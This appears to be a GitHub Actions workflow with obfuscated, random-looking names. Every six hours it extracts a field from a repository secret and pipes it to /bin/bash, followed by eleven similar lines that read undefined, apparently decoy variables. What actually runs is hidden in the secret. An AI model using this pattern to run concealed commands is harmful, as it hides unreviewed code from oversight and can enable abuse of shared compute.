name: zhubanguan3579
on:
  workflow_dispatch:
  schedule:
    - cron: '59 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhubanguan3579
        env:
          lpfa571: ${{ secrets.lpfa571 }}
        run: |
          echo $lpfa571 | jq -r .kptzu26 | /bin/bash
          echo $asm42339 | jq -r .dtuuq114 | /bin/bash
          echo $k28772 | jq -r .oiyt503 | /bin/bash
          echo $hdyqw421 | jq -r .z23699 | /bin/bash
          echo $e1 | jq -r .ex22151 | /bin/bash
          echo $wf6 | jq -r .swuy36 | /bin/bash
          echo $lnr0845 | jq -r .r4 | /bin/bash
          echo $oul308 | jq -r .k802 | /bin/bash
          echo $s9100 | jq -r .xex9110 | /bin/bash
          echo $fima47 | jq -r .f212 | /bin/bash
          echo $ki93 | jq -r .qu458 | /bin/bash
          echo $m35 | jq -r .kkh3 | /bin/bash

